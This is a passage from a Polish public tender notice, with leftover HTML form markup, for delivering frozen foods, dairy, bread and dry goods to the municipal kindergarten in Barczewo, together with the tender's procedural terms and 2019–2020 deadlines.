Truskawka mrożona op.450-2500g	kg	40013	Bukiet warzyw (brokuł, kalafior, marchew)op.450-2500g	kg	20014	Bukiet warzyw (kalafior, fasola szparagowa, marchew, brukselka, groch zielony)lub równoważna op.450-2500g	kg	10015	Marchew kostka op.450-2500g	kg	9016	Marchew z groszkiem op.450-2500g	kg	20017	Wiśnia bez pestek op.450-2500g	kg	35018	Porzeczka czarna mrożona op.450-2500g	kg	5019	Dorsz filet SHP	kg	22020	Miruna filet SHP	kg	29021	Morszczuk filet SHP	kg	19022	Dynia mrożona	kg	16023	Makrela wędzona	kg	10024	Włoszczyzna 3-składnikowa paski op.450-2500g	kg	15025	Ryba sola filet mrożona	kg	10026	Filet z sandacza	kg	5027	Mieszanka kompotowa z owoców leśnych op 2000-2500	kg	2028	Marchewka „Mini”	kg	20029	Mintaj filet SHP	kg	100 30	Maliny mrożone	kg	3031	Jagody mrożone	kg	30 CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie CPV 15.50.00.00-3Lp. Nazwa asortymentu Jednostka miary	Ilość1.	Mleko folia 2%op.1000ml	L	90002.	Mleko folia 3,2%	L	6003.	Mleko UHT op.1000ml 2%	L	10004.	Mleko UHT op.1000ml 3,2%	L	6005.	Masło ekstra zawierające co najmniej 82% tłuszczu	kg	6506.	Ser Mozarella	kg	507.	Serek homogenizowany wanilia op. co najmniej 135g	Szt.	7508. Jogurt naturalny typu greckiego lub bałkańskiego op. co najmniej 350g zawierający nie więcej niż 0,12g sodu/soli w 100g gotowego do spożycia produktu	L	5009.	Kefir naturalny op. co najmniej350g zawierający nie więcej niż 0,12g sodu/soli w 100g gotowego do spożycia produktu	L	35010.	Śmietana 12% op. co najmniej 400ml	L	60011	Ser żółty typu salami (nie dopuszcza się produktu seropodobnego)	kg	13012	Ser żółty typu gouda (nie dopuszcza się produktu seropodobnego)	kg	13013	Śmietana 10% op 400g	L	25014	Maślanka naturalna1000ml	L	10015	Twaróg krajanka półtłusty	kg	80016	Serek ziarnisty wiejski naturalny op.150-200g	Szt.	20017	Jogurt naturalny 2% tłuszczu op.150g	Szt.	40018	Śmietana 18%op.400ml	L	60 CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie CPV :15.81.00.00-9Lp. Nazwa asortymentu Jednostka miary	Ilość1.	Chleb pszenno- żytni krojony foliowany waga co najmniej 400-500g	Szt.	19002	Chleb żytni pełnoziarnisty krojony foliowany waga co najmniej 400g	Szt.	3703	Bułki kajzerki waga co najmniej 50g	Szt.	15004	Bułka grahamka waga co najmniej 50 g	Szt.	10005	Chleb wieloziarnisty zawartość minimum 3-ziarna(siemię lniane, słonecznik obowiązkowo, pozostałe dowolne) waga co najmniej 400-500g	Szt.	6006	Ciasto drożdżowe z niską zawartością cukru	kg	1307	Chałka zdobna co najmniej 300g	Szt.	6008	Chleb razowy waga min. 400g krojony, foliowany	Szt.	20009	Rogaliki krucho -drożdżowe nadziewane(z niska zawartością cukru)	kg	25010	Bułki z ziarnami dyni waga co najmniej 50g	Szt.	80011	Bułki czerstwe waga co najmniej waga 50g	Szt.	130012	Bułka tarta	kg	8013	Bułka z ziarnami różnymi waga min.50g	Szt.	230014	Bułka razowa z ziarnem waga co najmniej 50 g	Szt.	50015	Chleb wiejski waga min.400g	Szt.	30016	Rogale z makiem waga co najmniej 50g	Szt.	220017	Babka piaskowa	kg	10018	Pączki z nadzieniem owocowym, waga co najmniej 60 g	Szt.	25019	Chleb graham waga co najmniej 400-500g	Szt.	300 </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">03000000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>03000000-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2020-01-02</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Tak</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin płatności</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp"></span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-12-06</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego w Barczewie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Jaja kurze z chowu wolnowybiegowego klasa L	Szt.	130002	Makaron dwujajeczny różne kształty w oryginalnych opakowaniach od 400 do 500g pszenica zwyczajna	kg	2003	Makaron drobny gwiazdki,muszelkiop.250-500g	kg	304	Płatki owsiane op 500g	kg	355	Makaron wieloziarnisty spaghetti (brązowy) op 400g	kg	206	Płatki jęczmienne op 500g	kg	307	Kasza manna 1000g	kg	408	Kasza kukurydziana op.250-500g	kg	209	Kasza jaglana op. 400-1000g	kg	5010	Kasza jęczmienna średnia op. 400-1000g	kg	10011	Kasza gryczana prażona op. 400-1000g	kg	12012	Kasza pęczak op. 400-500g	kg	513	Mąka razowa op. 1000g	kg	2014	Mąka pszenna typ 550 op.1000g	kg	50015	Mąka ziemniaczana op.500-1000g	kg	5016	Płatki ryżowe op.250-500g	kg	4017	Ryż biały długoziarnisty op.500g-1000g	kg	13018	Ryż naturalny (brązowy) op.400g-1000g	kg	13019	Cukier biały kryształ, pakowany op.1000g	kg	40020	Dżem niskosłodzony różne smaki op. co najmniej 370g	Szt.	40021	Koncentrat pomidorowy 30% op. co najmniej 190g	Szt.	55022	Sól morska drobna, o niskiej zawartości sodu bez antyzbrylacza, op. 1000g	kg	11023	Kawa zbożowa rozpuszczalna składzboża72%(Jęczmień, żyto),cykoria, burak cukrowy-prażone. Op 150g	Szt.	12024	Kakao prawdziwe op.100-200g	kg	1525	Budyń w proszku różne smaki op. waga co najmniej 40g bez cukru	Szt.	70026	Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g	Szt.	10027	Olej z pierwszego tłoczenia rzepakowy op.900-1000g	L	22028	Olej słonecznikowy op.900-1000g	L	9029	Makaron pełnoziarnisty różne kształty op.500g (brązowy)	kg	15030	Herbata owocowa, saszetki, pakowana, op, co najmniej 25x50g szt	pacz	40031	Herbata miętowa saszetki, pakowana op. co najmniej 